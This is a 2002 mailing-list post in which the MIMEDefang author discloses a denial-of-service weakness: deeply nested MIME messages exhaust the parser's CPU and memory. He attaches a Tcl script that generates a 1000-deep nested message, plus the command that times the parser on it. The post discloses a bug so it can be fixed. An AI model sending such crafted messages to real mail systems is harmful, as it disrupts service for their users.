[Mimedefang] Deep recursion
David F. Skoll
dfs at roaringpenguin.com
Tue Jun 11 16:37:56 EDT 2002
Hi,
I figured out the problem. It was a deeply-nested MIME message. Be
aware that this could be a potential DoS attack against MIMEDefang. I've
attached a Tcl script which generates a 1000-deep nested MIME message.
The message is relatively small (only 88kB), but doing this:
tclsh degenerate.tcl | time mimedefang.pl -structure > /dev/null
reveals that mimedefang.pl uses 70 seconds of CPU time and over two
minutes of elapsed time on my P-II/400. It also seems to chew through
memory; I heard a lot of disk thrashing.
As far as I know, MIME::Tools has no way to abort a parse because
it's recursing too deeply. I'll consider adding that.
Also, please be aware that there are most likely many other ways
to confuse MIME::Tools with illegal or corner-case MIME messages. :-(
Regards,
David.
--- degenerate.tcl ---
#!/usr/bin/tclsh
set DEPTH 1000
puts "MIME-Version: 1.0"
puts "Content-Type: multipart/mixed; boundary=\"boundary.1\""
# Open up the parts
for {set i 1} {$i < $DEPTH} {incr i} {
puts ""
puts "--boundary.$i"
set j [expr $i + 1]
puts "Content-Type: multipart/mixed; boundary=\"boundary.$j\""
}
# Write the leaf
puts ""
puts "--boundary.$DEPTH"
puts "Content-Type: text/plain"
puts ""
puts "Foo!!"
# And close them
for {set i $DEPTH} {$i > 0} {incr i -1} {
puts ""
puts "--boundary.$i--"
}
More information about the MIMEDefang
mailing list